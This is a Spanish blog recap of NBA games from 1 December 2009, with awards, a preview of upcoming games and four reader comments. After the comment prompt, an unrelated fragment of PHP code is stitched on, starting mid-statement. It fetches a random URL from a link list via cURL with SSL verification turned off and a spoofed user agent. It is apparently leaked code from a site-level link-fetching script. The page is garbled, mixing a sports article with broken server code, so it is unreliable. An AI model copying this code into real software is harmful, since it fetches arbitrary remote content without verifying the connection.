La Crónica (01/12/2009)

02 de December de 2009 por MagicJohnson32

La noche llamaba a la honrilla de Mike D’Antoni ante su particular “derbi” contra estos magníficos Suns de Alvin Gentry. Run&Gun vs Run&Gun. Los Knicks se conjuraron para reivindicarse en lo suyo… y se dedicaron a acribillar de forma casi demencial el aro contrario. 31 triples lanzados sobre una muestra de 95 tiros en total. Lo que viene siendo “hasta las zapatillas” en castizo. De poco sirvió la teórica superior defensa de estos Suns, porque es que encima les entraba casi todo, sobre todo a Gallinari que parecía poseído. Pero es que los Knicks anoche fueron más en todo y no había otra que aguantar el chaparrón.

Los Lakers agradecieron el tropiezo cogiendo el liderato de la competición. Lo hicieron a la suya, dominando al tran-tran a estos disminuidos Hornets, sin quemarse demasiado y dando buenos minutos a la rotación. Son líder sólido, pero no hay que olvidar que son los que menos salidas han tenido y sus próximos partidos son contra Miami, Phoenix y Utah.

Los Nuggets también aprovecharon y recortaron distancias con los Suns. Se pusieron las botas frente a los Warriors, con Ellis más tranquilito. Fueron una apisonadora con 7 tíos en dobles figuras y diferencias de casi 30 puntos, 25 rebotes y 15 asistencias.

Quien parece que se descuelga de la carrera en el Oeste son los Blazers, que tropezaron por 3er partido consecutivo, en casa y contra los Heat. Ayer había excusa, pues Aldridge estaba lesionado y Beasley aprovechó para comérselos vivos. La paliza la evitaron André Miller y, sorprendentemente, Juwan Howard… aunque siendo realistas de poco les va a servir. Durante los últimos partidos la defensa de McMillan ha encajado más de 100 puntos de promedio. Si deja de funcionar hasta eso…

Pasando al Este, los Celtics ganaron su 5º consecutivo a cambio de evitar el de los Bobcats. La defensa de Doc Rivers anuló el remozado ataque de los de Brown… y éste no pudo hacer lo mismo con Ray Allen ni con Kedrick Perkins. Hemos hablado poco o nada de éste último. Lleva haciendo una excelente campaña incorporando un buen número de recursos ofensivos a su repertorio. Deberemos seguirlo más atentamente.

Por último, 4ª derrota consecutiva de Toronto a cambio de sacar a los Wizards de la crisis. Con esa defensa ni el mejor ataque del mundo podría llegar muy lejos. Calderon en esta ocasión muy bien dentro de la mediocridad institucionalizada en su equipo. También lo hizo bien Jarret Jack para ser justos.

PREMIOS

MVP: 30 puntos y 12 rebotes de Antawn Jamison. 27 puntos, 5 rebote sy 5 asistencias de Ray Allen. Cualquiera de estas dos actuaciones es digna del MVP pero hace ilusión premiar a un jugador que todavía no lo ha sido nunca. Danilo Gallinari fue el jugador clave de la sorprendente victoria de los Knicks frente los Suns. 27 puntos, 10 rebotes, 2 tapones con 6 de 12 en triples.

Rookie: Ante la ausencia de Chris Paul, Darren Collison (y no West, Okafor o Posey) menaje el cotarro en New Orleans. Ayer, 20 puntitos y 5 asistencias. Destacamos también el buen partido de Ty Lawson (13-5-5) y la primera titularidad de Dante Cunningham en los Blazers.

Sorpresa: Ante los malos últimos partidos de Calderon sorprende el buen partido de ayer: 20 puntos, 4 rebotes, 5 asistencias con buenos porcentajes de tiro. Kendrick Perkins también vio a la virgen anoche: 21 puntos y 12 rebotes.

Decepción: Hasta hace 2 días, Randy Foye gozaba de más de 30 minutos por partido en Minnesota pero ahora en los Wizards no pasa de los 10. Habría que preguntarse las causas de que todos sus compañeros le hayan pasado en la rotación.

Esfuerzo en vano: Bosh y Roy han hecho buenas actuaciones pero con muy malos porcentajes así que preferimos quedarnos con los 27 puntos de Anthony Morrow. Hoy sí que le han dejado tirar.

RAZONES PARA TRASNOCHAR

Se disputarán 10 partidos la próxima madrugada, pero uno destaca muy por encima del resto: la visita de los Suns a Cleveland (1h00). El choque de estilos, el colectivismo festivo liderado por Nash contra el LeBroncentrismo, promete un gran encuentro. A la misma hora puede ser interesante el duelo entre Arenas y Jennings, mientras que del resto de la jornada nos quedamos con un clásico del Este venido a menos, el Pistons @ Bulls (2h00), y con un partido entre dos equipos que quieren luchar por estar en Playoffs del Oeste, Rockets @ Clippers (4h30).

VIDEO DEL DÍA

Vaya juego se trajeron anoche Radmanovic y Nene. ¿Que tú me plantas un mate en la cara? A la siguiente te dejo un pincho de merluza…

Comenta

4 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Gallinari es muy bueno, si los Knicks se convierten el verano que viene en un equipo serio lo veremos con mas frecuencia.

    Portland a mi me parece bastante desastre.

      Citar

  2. pcerezo dice:
    #2

    Lo de Portland pinta muy, muy mal. Cinco años de Mcmillan y estamos donde empezamos.

    Lakers go!!! Sin duda muy favoritos a todo. Este Gasol cada día juega mejor, no para de mejorar, simplemente genial.

    Muy mala pinta los Raptors, lo de Turkoglu y Bargnani es para hacerlo mirar…vaya contratazos…veremos como evolucionan pero pueden ser un auténtico lastre….

    Pablo

      Citar

  3. Txusma dice:
    #3

    Yo creo que mas que el estado de forma, lo que ha provocado el bajón de Calderón es la llegada de Turkoglu. No es normal pasar de promediar 8.9 asistencias a 6.4 de una temporada a otra con los mismos minutos. Anotar anota lo mismo, de hecho con mejores porcentajes que el año pasado, y tiene menos pérdidas. Teniendo a Turkoglu en el equipo no sé si lo que necesitan los Raptors es un Calderón…

      Citar

  4. xapa_croack dice:
    #4

    Foye desde que ha salido de la lesion esta mal, no se si aun no esta al 100% o las urgencias de los wizards pq no se escapen los poffs.

    Buen partidillo de Okafor, ya lleva 2 seguidos cosa que no habia conseguido en lo que llevamos de temporada.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>